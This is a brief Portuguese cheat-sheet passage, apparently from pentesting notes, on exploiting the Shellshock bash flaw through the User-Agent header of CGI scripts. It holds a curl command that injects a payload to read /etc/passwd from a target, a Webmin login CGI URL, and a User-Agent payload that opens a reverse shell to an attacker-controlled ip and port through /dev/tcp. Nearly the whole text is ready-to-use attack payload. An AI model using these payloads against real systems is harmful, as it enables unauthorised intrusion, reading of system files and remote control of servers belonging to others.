Procure antes pelo arquivo cgi antes de realizar o inject no User Agent.
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://target.com/cgi-bin/vulnerable
http://<ip>:10000/session_login.cgi
User-agent: () { :;}; bash -i >& /dev/tcp/<ip>/<port> 0>&1
